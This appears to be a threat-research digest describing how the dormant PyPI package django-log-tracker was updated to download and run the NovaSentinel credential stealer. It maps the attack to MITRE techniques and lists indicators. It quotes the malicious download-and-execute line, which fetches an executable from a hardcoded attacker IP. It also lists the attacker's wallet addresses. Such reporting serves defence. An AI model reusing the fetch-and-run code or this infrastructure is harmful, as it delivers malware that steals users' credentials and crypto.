Threat Research

Dormant PyPI Package Updated to Deploy NovaSentinel Stealer

Securonix

A PyPI package named django-log-tracker was updated with malicious code, likely via a compromised PyPI account rather than legitimate repository activity. The update downloads and executes a NovaSentinel stealer payload, with a configuration that targets browser secrets, crypto wallets, tokens, and various applications, underscoring supply-chain risk in open-source software. #NovaSentinel #PyPI #Chrome #Discord

Keypoints

  • Malicious update to a PyPI package django-log-tracker—distinct from the April 2022 activity, suggesting account compromise.
  • Code behind the update downloads and runs an updater executable from a hardcoded IP address.
  • The dropped payload is an NSIS installer containing an Electron app with NovaSentinel stealer functionality.
  • NovaSentinel attempts to steal browser secrets, crypto wallets, Discord tokens, and other credentials, and to persist across Chrome, Discord, Exodus, Mullvad, Atomic, and MailSpring.
  • The malware includes a clipboard hijacker configuration and scheduled tasks StartCacaTask and WindowsDriverSetup for persistence.
  • IOCs include hardcoded wallet addresses and crypto transaction history, highlighting financial leakage risk.

MITRE Techniques

  • [T1195] Supply Chain Compromise – The attack vector appeared to be an attempted supply-chain attack via a compromised PyPI account. “The attack vector appeared to be an attempted supply-chain attack via a compromised PyPI account.”
  • [T1078] Valid Accounts – The compromise stemmed from a compromised PyPI account used to publish the malicious package. “…compromised PyPI account.”
  • [T1105] Ingress Tool Transfer – The code downloads and executes an updater from a hardcoded URL/IP: “URL = ‘http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe’ … os.startfile(fullPath)”
  • [T1027.001] Obfuscated/Compressed Files and Information – Heavily obfuscated JavaScript inside the NSIS installer leading to the NovaSentinel stealer. “heavily obfuscated JavaScript”
  • [T1053.005] Scheduled Task – Persistence via scheduled tasks StartCacaTask and WindowsDriverSetup. “registered as a scheduled task called ‘StartCacaTask’ … and ‘WindowsDriverSetup’.”
  • [T1555.003] Credentials from Web Browsers – The stealer attempts to harvest browser secrets as part of its data theft. “steal browser secrets”

Indicators of Compromise

  • [IP Address] context – 45.88.180.54, used to host and fetch the updater executable
  • [URL] context – http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe, the download location
  • [File Name] context – Updater_1.4.4_x64.exe, the deceptive updater name
  • [Wallet Address] context – eth_address: “0xb95C23e1aE44b00C160546eb70D383563142A1AE”, btc_address: “bc1qzgr9wcq28tu9md02rfp5f4tjvsguz7x2a00eye”
  • [Wallet Address] context – ltc_address, xlm_address, dash_address, bch_address, xrp_address, doge_address, etc., embedded in the clipboard hijacker config

Read more: https://blog.phylum.io/dormant-pypi-package-updated-to-deploy-novasentinel-stealer/